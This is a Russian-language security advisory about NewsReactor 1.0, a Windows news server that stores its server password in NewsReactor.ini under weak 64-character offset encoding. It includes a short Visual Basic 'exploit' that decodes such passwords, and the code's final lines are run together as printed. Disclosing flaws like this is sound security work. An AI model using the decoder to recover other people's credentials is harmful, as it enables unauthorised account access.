Раскрытие информации в NewsReactor

Дата публикации:
24.01.2002
Всего просмотров:
636
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: NewsReactor – News сервер для Microsoft Windows, поставляемый DaanSystems.

NewsReactor сохраняет информацию конфигурации сервера телеконференций в файле NewsReactor.ini. Пароль доступа к серверу телеконференций хранится в зашифрованном виде, используя технику кодирования slide-rule. Но когда пароль сохранен в файле NewsReactor.ini используется простой формат кодирования со смещением в 64 символа. Уязвимость найдена в DaanSystems NewsReactor 1.0

Эксплоит:

Пароль хранится после "Server0PassWord=" в файле NewsReactor.ini.

Private Sub Form_Load()
Dim YourPass As String, PrintPass As String
YourPass = InputBox("Enter in the encrypted password below.") 
For x = 1 To Len(YourPass)
    PrintPass = PrintPass & Chr(Asc(Mid(YourPass, x, 1)) - 64) 
Next MsgBox "Password: " & PrintPass End End Sub


Ссылки: http://www.daansystems.com/newsreactor
или введите имя

CAPTCHA